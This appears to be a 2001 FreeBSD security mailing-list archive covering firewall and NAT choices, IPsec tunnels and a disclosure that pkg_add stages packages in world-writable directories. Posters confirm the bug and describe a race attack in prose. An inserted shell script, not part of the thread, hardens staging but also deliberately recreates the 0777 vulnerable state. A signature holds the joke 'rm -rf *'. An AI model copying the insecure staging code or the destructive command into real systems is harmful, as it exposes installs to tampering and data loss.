many moons ago i wrote an install script for pipsecd that ensures you've got both ends set up correctly... not sure how out of date this now is, but for what it's worth:

ftp://ftp.algroup.co.uk/pub/outgoing/pipsecconf.tgz

"setup.sh" is the thing you want to look at first.
cheers,
Adam
--
Adam Laurie                   Tel: +44 (20) 8742 0755
A.L. Digital Ltd.             Fax: +44 (20) 8742 5995
The Stores                    http://www.thebunker.net
2 Bath Road                   http://www.aldigital.co.uk
London W4 1LT                 mailto:adam@algroup.co.uk
UNITED KINGDOM                PGP key on keyservers

From: Lee Brotherston
To: 'Ron Rosson', security@freebsd.org
Subject: RE: IPSec Tunnel
Date: Wed, 21 Nov 2001 15:45:06 -0000

There are a few ways. The easiest way I've found is to use mpd-netgraph. I must confess I'm not 100% sure if it is _actual_ IPSec, but it is IPSec like. It's a VPN-tunnel-on-demand daemon; it's part of the FreeBSD ports for an easy start point.
I'm not sure how portable it is, so I can't say whether it would like OpenBSD, but being one of FreeBSD's closer relations it is more likely to work there than anywhere else ;)

I've used it between a couple of FreeBSD boxes in a test environment using the PPTP with encryption option, and got it working properly with applications running over it and everything in less than an hour, so it's not too hard :)

The other method I've seen is using the gif(n) interface.... 'man setkey' explains it better than I could ;)

Thanks

Lee

--
Lee Brotherston - IP Security Manager, Easynet Ltd
http://www.easynet.net/ Phone: +44 20 7900 4444

| -----Original Message-----
| From: Ron 'The InSaNe One' Rosson
| [mailto:insane@lunatic.oneinsane.net]
| Sent: 21 November 2001 14:35
| To: security@freebsd.org
| Subject: IPSec Tunnel
|
|
| Heya,
| Anyone know of any links on how to build an ipsec tunnel between an
| openbsd machine and a freebsd machine?
|
| Been working on it for 2 days now and everything I found is
| incomplete
| and does not work.
|
| TIA
|
| --
| Ron Rosson                    ... and a UNIX user said ...
| The InSaNe One                        rm -rf *
| insane@oneinsane.net          and all was /dev/null and *void()
| ...and that is how we know the Earth to be banana-shaped.
From: "Steven M. Seltzer"
To: "freebsd-security@freebsd.org"
Subject: New Dental Practice Philosophy
Date: Wed, 21 Nov 2001 10:51:34 -0500

Hi,

I would like to wish you a very Happy Thanksgiving!

We recently created a one page practice philosophy statement that emphasizes teamwork, caring, helping others, and developing your full potential by assuming a more active role in the practice.

This philosophy is designed specifically for updating skills in the practice to utilize technology tools that improve productivity and efficiency.

If you would like to receive this philosophy statement with my compliments, please reply to this e-mail with your name, address, and e-mail address where you would like the philosophy sent.

If you prefer not to receive future technology and practice management updates like this one, please reply to this message and type "remove" in the subject line.

Thank you.
Best regards,

Steve Seltzer
www.hitecdentist.com

From: "Fernando Germano"
Subject: Best security topology for FreeBSD
Date: Wed, 21 Nov 2001 13:35:18 -0300

Could you please help me?

I'm about to install a FreeBSD 4.4 box with some firewall and I need to know which one of the freeware firewall products is the best (IPFW, IPFilter, etc), or maybe if you could recommend me a good solution for this situation:

FreeBSD box = firewall with 10 NICs

NIC 1 -> DMZ
NIC 2 -> Internet
NIC 3 -> Partner network
.
.
NIC 8 -> Partner network
NIC 9 -> Internal network
NIC 10 -> Internal network

Well, this is it, I need a good firewall + NAT solution, could you please help me??

Thanks in advance

Fernando

PD: Sorry if this message is kind of "off-topic"; if this is the case please answer directly to my private address, thank you.
From: Lee Brotherston
To: 'Fernando Germano', security@FreeBSD.ORG
Subject: RE: Best security topology for FreeBSD
Date: Wed, 21 Nov 2001 16:49:24 -0000

| I'm about to install a FreeBSD 4.4 box with some firewall and
| I need to know
| which one of the freeware firewall products is the best (IPFW,
| IPFilter,
| etc), or maybe if you could recommend me a good solution for
| this situation:

I would say that IPFilter is your best option at the moment. It is very rich in features and I believe it has some NAT-specific functionality built into it, although I've never used the NAT stuff so I can't vouch for it personally.

You can also compile the kernel to use both ipfw and ipfilter for the best of both worlds. When you do this, I am not sure which one gets passed the packet first however.
Thanks

Lee

--
Lee Brotherston - IP Security Manager, Easynet Ltd
http://www.easynet.net/ Phone: +44 20 7900 4444

From: freebsd-security@rikrose.net
To: security@FreeBSD.ORG
Subject: RE: Best security topology for FreeBSD
Date: Wed, 21 Nov 2001 17:01:15 +0000 (GMT)

For something that large, I'd wonder why you're not using a hardware router, but, to answer the question that was asked, I'd use *both* IPFilter and IPFW.

I would use ipfilter for filtering and NAT (if needed), since it is actually better at doing that, and ipfw for bandwidth limiting/traffic shaping.

As to which one sees the packet first, packets would come in on an interface, go through the ipfw rules, then the ipfilter rules, then out again (possibly through the rules again, assuming you don't do anything like use fastroute rules on either).

Basically, ipfw doesn't give as much control over the packets and filtering as ipfilter, so use both.

Useful url: http://www.obfuscation.org/ipf

there's probably a good one for ipfw too, but i use ipfilter, and haven't had the need for traffic shaping yet...
--
PGP Key: D2729A3F - Keyserver: wwwkeys.uk.pgp.net - rich at rdrose dot org
Key fingerprint = 5EB1 4C63 9FAD D87B 854C 3DED 1408 ED77 D272 9A3F
Public key also encoded with outguess on http://rikrose.net

From: Lee Brotherston
To: security@FreeBSD.ORG
Subject: RE: Best security topology for FreeBSD
Date: Wed, 21 Nov 2001 17:06:11 -0000

| I would use ipfilter for filtering and NAT (if needed), since it is
| actually better at doing that, and ipfw for bandwidth limiting/traffic
| shaping.

If you're getting into shaping, then Dummynet is worth a peek; you do need ipfw for that.
Lee

From: "Fernando Germano"
Subject: RE: Best security topology for FreeBSD
Date: Wed, 21 Nov 2001 14:12:12 -0300

Well, the answer is simple: money. We don't use something like PIX because it's way too expensive for something like this.

I'm worried about NAT; will FreeBSD and IpFilter be able to NAT all of this traffic??

-----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of freebsd-security@rikrose.net
Sent: Wednesday, 21 November 2001 02:01 p.m.
To: security@FreeBSD.ORG
Subject: RE: Best security topology for FreeBSD

For something that large, I'd wonder why you're not using a hardware router, but, to answer the question that was asked, I'd use *both* IPFilter and IPFW.
I would use ipfilter for filtering and NAT (if needed), since it is actually better at doing that, and ipfw for bandwidth limiting/traffic shaping.

As to which one sees the packet first, packets would come in on an interface, go through the ipfw rules, then the ipfilter rules, then out again (possibly through the rules again, assuming you don't do anything like use fastroute rules on either).

Basically, ipfw doesn't give as much control over the packets and filtering as ipfilter, so use both.

Useful url: http://www.obfuscation.org/ipf

there's probably a good one for ipfw too, but i use ipfilter, and haven't had the need for traffic shaping yet...

--
PGP Key: D2729A3F - Keyserver: wwwkeys.uk.pgp.net - rich at rdrose dot org
Key fingerprint = 5EB1 4C63 9FAD D87B 854C 3DED 1408 ED77 D272 9A3F
Public key also encoded with outguess on http://rikrose.net

From: Bart Matthaei
To: freebsd-security@rikrose.net
Cc: security@freebsd.org
Subject: Re: Best security topology for FreeBSD
Date: Wed, 21 Nov 2001 18:19:29 +0100

On Wed, Nov 21, 2001 at 05:01:15PM +0000, freebsd-security@rikrose.net wrote:
> Basically, ipfw doesn't give as much control over the packets and
> filtering as ipfilter, so use both.

Care to explain why? I think ipfw/ipf handle packets just as well.. The only thing I recall is a story about ipfw sending packets through userland (?!). But that's just a vague story I've read somewhere.

I don't see why ipfw can't do what he needs. Ipfw works pretty well with NAT, and it's good with traffic shaping. And I personally haven't had any troubles with ipfw filtering.

Regards,

B.

--
Bart Matthaei bart@dreamflow.nl

/* Welcome to my world.. You just live in it */

From: "Dave Raven"
Subject: Re: Best security topology for FreeBSD
Date: Wed, 21 Nov 2001 19:25:12 +0200

ipfw runs in the kernel, but NAT runs in userland. With IPFilter this is not so, IPNat runs in the kernel and should be faster. If you are planning on large usage I would recommend IPFilter (less load) and IPNat.

but then, don't quote me.

--Dave
Optec Sec.

----- Original Message -----
From: "Bart Matthaei"
Sent: Wednesday, November 21, 2001 7:19 PM
Subject: Re: Best security topology for FreeBSD

> On Wed, Nov 21, 2001 at 05:01:15PM +0000, freebsd-security@rikrose.net
> wrote:
> > Basically, ipfw doesn't give as much control over the packets and
> > filtering as ipfilter, so use both.
>
> Care to explain why? I think ipfw/ipf handle packets just as well..
> The only thing I recall is a story about ipfw sending packets through
> userland (?!). But that's just a vague story I've read somewhere.
>
> I don't see why ipfw can't do what he needs. Ipfw works pretty well
> with NAT, and it's good with traffic shaping. And I personally haven't
> had any troubles with ipfw filtering.
>
> Regards,
>
> B.
>
> --
> Bart Matthaei bart@dreamflow.nl
>
> /* Welcome to my world..
> You just live in it */

From: The Anarcat
To: Bart Matthaei
Cc: freebsd-security@rikrose.net, security@freebsd.org
Subject: Re: Best security topology for FreeBSD
Date: Wed, 21 Nov 2001 12:31:06 -0500

On Wed Nov 21, 2001 at 06:19:29PM +0100, Bart Matthaei wrote:
> On Wed, Nov 21, 2001 at 05:01:15PM +0000, freebsd-security@rikrose.net wrote:
> > Basically, ipfw doesn't give as much control over the packets and
> > filtering as ipfilter, so use both.
>
> Care to explain why?

For this I don't know. I thought both had the same capabilities too.

> I think ipfw/ipf handle packets just as well..

Agreed.

> The only thing I recall is a story about ipfw sending packets through
> userland (?!). But that's just a vague story I've read somewhere.

It's not a vague story. *In order to do NAT*, you must send packets to the natd daemon, using a divert rule. ipf doesn't need that, as there is an ipnat kernel module to replace natd.

a.

From: Bart Matthaei
To: Dave Raven
Cc: security@freebsd.org
Subject: Re: Best security topology for FreeBSD
Date: Wed, 21 Nov 2001 18:31:51 +0100

On Wed, Nov 21, 2001 at 07:25:12PM +0200, Dave Raven wrote:
> ipfw runs in the kernel, but NAT runs in userland.

hmm.. bummer :)

> With IPFilter this is not so, IPNat runs in the kernel and should be faster.
> If you are planning on large usage I would recommend IPFilter (less load)
> and IPNat.

I still don't see why ipf would be better when it comes to filtering.

B.

--
Bart Matthaei bart@dreamflow.nl

/* Welcome to my world.. You just live in it */

From: Fernando Schapachnik
To: Fernando Germano
Cc: security@FreeBSD.ORG
Subject: Re: Best security topology for FreeBSD
Date: Wed, 21 Nov 2001 14:40:28 -0300
<20011121144028.B27934@ns1.via-net-works.net.ar> References: <00d201c172af$a96227b0$ed64a8c0@audi2k> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5i In-Reply-To: <00d201c172af$a96227b0$ed64a8c0@audi2k>; from fgermano@audiotel.com.ar on Wed, Nov 21, 2001 at 02:12:12PM -0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org En un mensaje anterior, Fernando Germano escribió: > > We'll, the answer is simple: money, we don't use something like PIX because > it's way too expensive for something like this. > > I'm worried about NAT, will FreeBSD and IpFilter be able to NAT all of this > traffic?? I've used IP Filter in a couple of heavy-loaded scenarios and never had a problem (also, machine load was almost allways at 0). Good luck. Fernando P. Schapachnik Gerente de tecnología de red y sistemas de información VIA NET.WORKS ARGENTINA S.A. 
fschapachnik@vianetworks.com.ar Tel.: (54-11) 4323-3381 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 9:44:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from chaos.evolve.za.net (chaos.evolve.za.net [196.34.172.107]) by hub.freebsd.org (Postfix) with ESMTP id 82D6E37B417 for ; Wed, 21 Nov 2001 09:44:41 -0800 (PST) Received: from nunetnt2.nunet.local ([192.168.0.10]) by chaos.evolve.za.net (8.11.6/1.1.3) with ESMTP id fALHicl42632 for ; Wed, 21 Nov 2001 19:44:39 +0200 (SAST) (envelope-from pheonix@area.co.za) Received: from DAVE (MANDY [192.168.0.54]) by nunetnt2.nunet.local with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id XK5HMX1V; Wed, 21 Nov 2001 19:43:19 +0200 Message-ID: <009d01c172b3$cb35d5e0$3600a8c0@DAVE> From: "Dave Raven" To: References: <20011121183151.B15275@heresy.dreamflow.nl> Subject: Re: Best security topology for FreeBSD Date: Wed, 21 Nov 2001 19:41:45 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This may not be true, but I think that there is far less cpu utilization with IpFilter when it comes to rule proccessing. ----- Original Message ----- From: "Bart Matthaei" To: "Dave Raven" Cc: Sent: Wednesday, November 21, 2001 7:31 PM Subject: Re: Best security topology for FreeBSD > On Wed, Nov 21, 2001 at 07:25:12PM +0200, Dave Raven wrote: > > ipfw runs in the kernel, but NAT runs in userland. > > hmm.. bummer :) > > > With IPFilter this is not so, IPNat runs in the kernel and should be > faster. 
> > If you are planning on large usage I would recommend IPFilter (less > load) > > and IPNat. > > I still dont see why ipf would be better when it comes to filtering. > > B. > > -- > Bart Matthaei bart@dreamflow.nl > > /* Welcome to my world.. You just live in it */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 10:23:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from pa169.kurdwanowa.sdi.tpnet.pl (pa169.kurdwanowa.sdi.tpnet.pl [213.77.148.169]) by hub.freebsd.org (Postfix) with ESMTP id B4C0837B431 for ; Wed, 21 Nov 2001 10:23:07 -0800 (PST) Received: by pa169.kurdwanowa.sdi.tpnet.pl (Postfix, from userid 1001) id 1CB891DA7; Wed, 21 Nov 2001 19:22:57 +0100 (CET) Received: from localhost (localhost [127.0.0.1]) by pa169.kurdwanowa.sdi.tpnet.pl (Postfix) with ESMTP id D446955A2; Wed, 21 Nov 2001 19:22:57 +0100 (CET) Date: Wed, 21 Nov 2001 19:22:57 +0100 (CET) From: Krzysztof Zaraska X-Sender: kzaraska@lhotse.zaraska.dhs.org To: Bart Matthaei Cc: Dave Raven , security@FreeBSD.ORG Subject: Re: Best security topology for FreeBSD In-Reply-To: <20011121183151.B15275@heresy.dreamflow.nl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 21 Nov 2001, Bart Matthaei wrote: > > With IPFilter this is not so, IPNat runs in the kernel and should be faster. > > If you are planning on large usage I would recommend IPFilter (less load) > > and IPNat. > > I still dont see why ipf would be better when it comes to filtering. This issue (at least in one aspect) has been discussed on this list around Oct 30 (thread about keep-state and ICMP). 
The discussion strayed from the original topic and someone pointed out that ipfilter does a more careful inspection when dealing with dynamic rules (checks TCP sequence numbers etc.). Regards, Krzysztof To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 11:16:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from tomts10-srv.bellnexxia.net (tomts10.bellnexxia.net [209.226.175.54]) by hub.freebsd.org (Postfix) with ESMTP id F17F237B419 for ; Wed, 21 Nov 2001 11:16:36 -0800 (PST) Received: from khan.anarcat.dyndns.org ([65.94.128.110]) by tomts10-srv.bellnexxia.net (InterMail vM.4.01.03.16 201-229-121-116-20010115) with ESMTP id <20011121191636.CDOF17034.tomts10-srv.bellnexxia.net@khan.anarcat.dyndns.org> for ; Wed, 21 Nov 2001 14:16:36 -0500 Received: from shall.anarcat.dyndns.org (shall.anarcat.dyndns.org [192.168.0.1]) by khan.anarcat.dyndns.org (Postfix) with ESMTP id 408501A38 for ; Wed, 21 Nov 2001 14:17:46 -0500 (EST) Received: by shall.anarcat.dyndns.org (Postfix, from userid 1000) id 6162420ADB; Wed, 21 Nov 2001 14:18:08 -0500 (EST) Date: Wed, 21 Nov 2001 14:18:08 -0500 From: The Anarcat To: FreeBSD Security Issues Subject: fun with pkg_add Message-ID: <20011121191808.GD44370@shall.anarcat.dyndns.org> Mail-Followup-To: FreeBSD Security Issues Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="76DTJ5CE0DCVQemd" Content-Disposition: inline User-Agent: Mutt/1.3.23.2i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --76DTJ5CE0DCVQemd Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Hi! I just noticed something that could be a problem with pkg_add algorithms. 
When it installs a package, it first untars it in a temporary directory. The problem is that the subdirectories of the package created this way are world-writable:

$ ftp -a ftp://ftp.freebsd.org/pub/FreeBSD/ports/packages/All/auctex-10.0g.tgz
$ pkg_add auctex-10.0g.tgz
^Z
$ ls -l /var/tmp/inst*
total 23
-rw-r--r-- 1 root wheel 57 12 nov 02:07 +COMMENT
-rw-r--r-- 1 root wheel 11223 12 nov 02:07 +CONTENTS
-rw-r--r-- 1 root wheel 1224 12 nov 02:07 +DESC
-rw-r--r-- 1 root wheel 815 12 nov 02:07 +DISPLAY
-r--r--r-- 1 root wheel 5181 12 nov 02:07 +MTREE_DIRS
drwxrwxrwx 2 root wheel 512 21 nov 14:15 info/
drwxrwxrwx 4 root wheel 512 21 nov 14:15 share/

Lovely. I don't exactly know why it happens this way.

I think this could be a security problem if a random user happens to run around /var/tmp while the admin is adding a package.

Am I wrong?

A.

From: "Stephen T. Shipley"
To: fgermano@audiotel.com.ar, security@FreeBSD.ORG
Date: Wed, 21 Nov 2001 14:19:42 -0500 (EST)
Subject: Re: Best security topology for FreeBSD
Message-Id: <200111211919.fALJJgH03507@e-shipley.com>
In-Reply-To: <00ca01c172aa$814c90d0$ed64a8c0@audi2k>

Try "hlfl" located in /usr/ports/security/hlfl. Very useful for evaluating the management languages for ipfw, ipfilter, ipfwadm, ipchains, netfilter, and cisco. In a crunch you need to be quick. So I would favor ease of management (ipfilter).

--Steve

From: Eric Anderson
Organization: Centaur Technology
To: The Anarcat
Cc: FreeBSD Security Issues
Date: Wed, 21 Nov 2001 13:37:01 -0600
Subject: Re: fun with pkg_add
Message-ID: <3BFC025D.36710154@centtech.com>
References: <20011121191808.GD44370@shall.anarcat.dyndns.org>

The only danger I see is a potential that the user could replace the binary with a hacked version, between untarring and installing, creating a breach. Other than that, it's the same as a /var/tmp directory almost. Although I see what you are saying, and do think this could be a potential problem..

Eric

The Anarcat wrote:
[snip]

--
-------------------------------------------------------------
Eric Anderson anderson@centtech.com Centaur Technology
An unbreakable toy is useful for breaking other toys.
-------------------------------------------------------------

From: The Anarcat
To: Eric Anderson
Cc: FreeBSD Security Issues
Date: Wed, 21 Nov 2001 14:41:59 -0500
Subject: Re: fun with pkg_add
Message-ID: <20011121194159.GA69296@shall.anarcat.dyndns.org>
In-Reply-To: <3BFC025D.36710154@centtech.com>

On Wed Nov 21, 2001 at 01:37:01PM -0600, Eric Anderson wrote:
> The only danger I see is a potential that the user could
> replace the binary with a hacked version, between untarring
> and installing, creating a breach.

Yes. This is what I saw too.

> Other than that, it's the same as a /var/tmp directory almost.

Except that /var/tmp is a "known issue" and admins are generally aware of its vulnerability. Admins surely don't expect their installed packages to be overwritable.

I will open a PR about this.

A.

From: airot@lazir.toya.net.pl
To: The Anarcat
Cc: FreeBSD Security Issues
Date: Wed, 21 Nov 2001 20:38:06 +0100 (CET)
Subject: Re: fun with pkg_add
In-Reply-To: <20011121191808.GD44370@shall.anarcat.dyndns.org>

On Wed, 21 Nov 2001, The Anarcat wrote:
> Hi!
>
> I just noticed something that could be a problem with pkg_add
> algorithms. When it installs a package, it first untars it in a
> temporary directory. The problem is that the subdirectories of the
> package created this way are world-writable:
>
> $ ftp -a ftp://ftp.freebsd.org/pub/FreeBSD/ports/packages/All/auctex-10.0g.tgz
> $ pkg_add auctex-10.0g.tgz
> ^Z

^Z is SIGTSTP; it suspends processes. There is a very small possibility that our 'attacker' will change something when you are installing a package. ;-)

I didn't check the /var/tmp/inst* directory permissions, but I guess it's impossible to exploit this security issue.

Regards.
airot...

From: The Anarcat
To: airot@lazir.toya.net.pl
Cc: FreeBSD Security Issues
Date: Wed, 21 Nov 2001 14:46:34 -0500
Subject: Re: fun with pkg_add
Message-ID: <20011121194634.GB69296@shall.anarcat.dyndns.org>

On Wed Nov 21, 2001 at 08:38:06PM +0100, airot@lazir.toya.net.pl wrote:
> On Wed, 21 Nov 2001, The Anarcat wrote:
> > I just noticed something that could be a problem with pkg_add
> > algorithms. When it installs a package, it first untars it in a
> > temporary directory. The problem is that the subdirectories of the
> > package created this way are world-writable:
> >
> > $ ftp -a ftp://ftp.freebsd.org/pub/FreeBSD/ports/packages/All/auctex-10.0g.tgz
> > $ pkg_add auctex-10.0g.tgz
> > ^Z
>
> ^Z is SIGTSTP; it suspends processes. There is a very small possibility that
> our 'attacker' will change something when you are installing a package. ;-)

Wrong. With large packages such as XFree86, the untarring actually takes a few minutes, sometimes, and thus leaves a large window of attack.

> I didn't check the /var/tmp/inst* directory permissions, but I guess it's
> impossible to exploit this security issue.

Again, I do not agree, as I have exploited this security issue.

It might be related to some misconfiguration on my side (but I doubt it), and it is why I sent this to the list first, to get some confirmation of the bug.

A.
From: Eric Anderson
Organization: Centaur Technology
To: The Anarcat
Cc: airot@lazir.toya.net.pl, FreeBSD Security Issues
Date: Wed, 21 Nov 2001 13:50:21 -0600
Subject: Re: fun with pkg_add
Message-ID: <3BFC057D.49A7AE1B@centtech.com>
References: <20011121191808.GD44370@shall.anarcat.dyndns.org> <20011121194634.GB69296@shall.anarcat.dyndns.org>

It would be very trivial to write a script that watched every second for a new package install, overwriting the executable binaries with hacked scripts or other binaries, without an attacker even paying attention.. 15 minutes with perl and you have your exploit.

Eric

The Anarcat wrote:
[snip]

--
-------------------------------------------------------------
Eric Anderson anderson@centtech.com Centaur Technology
An unbreakable toy is useful for breaking other toys.
-------------------------------------------------------------

From: Bart Matthaei
To: The Anarcat
Cc: security@freebsd.org
Date: Wed, 21 Nov 2001 20:55:19 +0100
Subject: Re: fun with pkg_add
Message-ID: <20011121205519.A16928@heresy.dreamflow.nl>
In-Reply-To: <20011121191808.GD44370@shall.anarcat.dyndns.org>

On Wed, Nov 21, 2001 at 02:18:08PM -0500, The Anarcat wrote:
[snip]

20 bart@heresy tmp 20:50 # pkg_add ~bart/fasta3-33.t08.d4.tgz
^Z
Suspended
21 bart@heresy tmp 20:50 # ls
instmp.GUTUuC vi.recover
22 bart@heresy tmp 20:50 # ls -l
total 2
drwxr-xr-x 6 root wheel 512 Nov 21 20:50 instmp.GUTUuC
drwxrwxrwt 2 root wheel 512 Nov 21 19:59 vi.recover
23 bart@heresy tmp 20:51 # ls -l instmp.GUTUuC/
total 17
-rw-r--r-- 1 root wheel 69 Nov 12 20:10 +COMMENT
-rw-r--r-- 1 root wheel 4127 Nov 12 20:10 +CONTENTS
-rw-r--r-- 1 root wheel 971 Nov 12 20:10 +DESC
-r--r--r-- 1 root wheel 5181 Nov 12 20:10 +MTREE_DIRS
drwxrwxrwx 2 root wheel 512 Nov 21 20:50 bin
drwxrwxrwx 2 root wheel 512 Nov 21 20:50 etc
drwxrwxrwx 3 root wheel 512 Nov 21 20:50 man
drwxrwxrwx 3 root wheel 512 Nov 21 20:50 share

Confirmed on FreeBSD 4.4-RELEASE:

FreeBSD heresy.dreamflow.nl 4.4-RELEASE FreeBSD 4.4-RELEASE #9: Thu Nov 15 12:36:09 CET 2001

Rgds,

B.

p.s. I have no clue what fasta is ;) (just grabbed a random gz), so don't flame me for installing barbie doll simulators or something :)

--
Bart Matthaei bart@dreamflow.nl

/* Welcome to my world.. You just live in it */

From: Paul van der Zwan
To: security@FreeBSD.ORG
Date: Wed, 21 Nov 2001 21:02:57 +0100
Subject: ipfw and snort
Message-Id: <200111212002.fALK2vV20500@trantor.xs4all.nl>

I would like to run snort on my ppp link to my ISP to see what people are trying, but I also have a set of ipfw rules to allow only the traffic I want to allow. Is there a way to have those rules in place but still have snort see all incoming packets, including those running into the deny rules??

Paul

--
Paul van der Zwan paulz @ trantor.xs4all.nl
"I think I'll move to theory, everything works in theory..."

From: airot@lazir.toya.net.pl
To: Bart Matthaei
Cc: The Anarcat
Date: Wed, 21 Nov 2001 21:05:41 +0100 (CET)
Subject: Re: fun with pkg_add
In-Reply-To: <20011121205519.A16928@heresy.dreamflow.nl>

Well, the problem exists; it should have 700 permissions. The only problem is time, and you don't know what kind of package is being installed right now, so exploiting is rather easy but problematical.

Regards.
airot..
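Added example, not part of this thread and not FreeBSD's pkg_add code: a POSIX sh script for the check and the fix the pkg_add messages above are circling around. world_writable_dirs is the audit an admin can run against /var/tmp while a package is being added; stage_package_insecure recreates the state in Bart's listing (a 0755 instmp.* directory with 0777 subdirectories) so the audit has something to catch; stage_package is the 700-mode staging airot describes, with the untar done under a restrictive umask so there is no window in which another local user can reach the files. The sample package, the function names and the instmp.* template are constructed for the demo; only mktemp, tar, find and ls are assumed to exist.

```shell
#!/bin/sh
# Added example; not code from this thread or from FreeBSD's pkg_add.
# It shows the check and the fix discussed above: audit a staging tree
# for directories other local users can write to, and stage a package
# tarball in a private (0700) directory so the untar window cannot be
# used to swap files. Assumes POSIX sh, mktemp, tar, find and ls only.
# The sample package and the instmp.* naming are constructed for the demo.
set -eu

TMP=${TMPDIR:-/tmp}

# Print every directory below $1 that is world-writable (o+w).
# Returns 0 when none were found, 1 when at least one was.
world_writable_dirs() {
    _found=$(find "$1" -type d -perm -002 -print)
    [ -n "$_found" ] && printf '%s\n' "$_found"
    [ -z "$_found" ]
}

# Mode field of ls -ld, e.g. drwx------ (works with GNU and BSD ls).
dir_mode() {
    ls -ld "$1" | cut -c1-10
}

# Build a constructed sample package (not a real FreeBSD package) with the
# layout seen in the listings above: +CONTENTS plus bin/ and share/ trees.
make_sample_package() {
    _src=$(mktemp -d "$TMP/pkgsrc.XXXXXX")
    mkdir -p "$_src/bin" "$_src/share/doc"
    printf '@name sample-1.0\nbin/hello\nshare/doc/README\n' > "$_src/+CONTENTS"
    printf '#!/bin/sh\necho hello\n' > "$_src/bin/hello"
    chmod 755 "$_src/bin/hello"
    : > "$_src/share/doc/README"
    tar -C "$_src" -cf "$1" ./+CONTENTS ./bin ./share
    rm -rf "$_src"
}

# Recreate the state Bart's listing shows for pkg_add on 4.4-RELEASE:
# a 0755 instmp.* directory whose subdirectories are 0777.
stage_package_insecure() {
    _stage=$(mktemp -d "$TMP/instmp.XXXXXX")
    chmod 755 "$_stage"
    tar -C "$_stage" -xf "$1"
    find "$_stage" -type d ! -path "$_stage" -exec chmod 777 {} +
    printf '%s\n' "$_stage"
}

# Hardened staging: mktemp -d creates a 0700 directory, the umask keeps
# everything made during the untar private, the explicit chmod covers tar
# run as root (which restores archived modes), and no directory in the
# tree keeps a group/other write bit. Prints the staging directory.
stage_package() {
    _stage=$(mktemp -d "$TMP/instmp.XXXXXX")
    (umask 077 && tar -C "$_stage" -xf "$1")
    chmod 700 "$_stage"
    find "$_stage" -type d -exec chmod go-w {} +
    printf '%s\n' "$_stage"
}

# Stage the sample package both ways and audit each result.
demo() {
    _pkg=$(mktemp "$TMP/pkg.XXXXXX")
    make_sample_package "$_pkg"

    _bad=$(stage_package_insecure "$_pkg")
    echo "insecure staging $_bad ($(dir_mode "$_bad")), world-writable dirs:"
    world_writable_dirs "$_bad" || true

    _good=$(stage_package "$_pkg")
    echo "hardened staging $_good ($(dir_mode "$_good")), world-writable dirs:"
    world_writable_dirs "$_good" && echo "(none)"

    rm -rf "$_bad" "$_good" "$_pkg"
}

if [ "${1-}" = "--demo" ]; then demo; fi
```

Run it with --demo to see the two stagings side by side. The private root directory is what closes the race: once the instmp.* directory itself is 0700, the modes of the subdirectories no longer matter, because nobody else can traverse into them. The find over the tree is kept as defence in depth for the case where tar runs as root and restores 0777 directory modes from the archive, which a umask alone does not prevent.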
From owner-freebsd-security Wed Nov 21 12:13:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from I-Sphere.COM (shell.i-sphere.com [209.249.146.70]) by hub.freebsd.org (Postfix) with ESMTP id 0413537B405 for ; Wed, 21 Nov 2001 12:13:37 -0800 (PST)
Received: (from fasty@localhost) by I-Sphere.COM (8.11.6/8.11.6) id fALKDdS30442; Wed, 21 Nov 2001 12:13:39 -0800 (PST) (envelope-from fasty)
Date: Wed, 21 Nov 2001 12:13:39 -0800
From: faSty
To: Paul van der Zwan
Cc: freebsd-security@freebsd.org
Subject: Re: ipfw and snort
Message-ID: <20011121121339.B30001@i-sphere.com>
References: <200111212002.fALK2vV20500@trantor.xs4all.nl>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200111212002.fALK2vV20500@trantor.xs4all.nl>; from paulz@trantor.xs4all.nl on Wed, Nov 21, 2001 at 09:02:57PM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe:
X-Loop: FreeBSD.org

I recommend grabbing Guardian v2.6.3 for snort. It's an excellent protection with a timed unblock. They support FreeBSD too.

URL: http://www.chaotic.org/guardian/

This Guardian worked beautifully to control the attackers; 64000 IPs attacked my server last week.

-trev

On Wed, Nov 21, 2001 at 09:02:57PM +0100, Paul van der Zwan wrote:
>
> I would like to run snort on my ppp link to my ISP to see what people are
> trying, but I also have a set of ipfw rules to allow only the traffic I
> want to allow.
> Is there a way to have those rules in place but still have snort see all
> incoming packets including those running into the deny rules ??
>
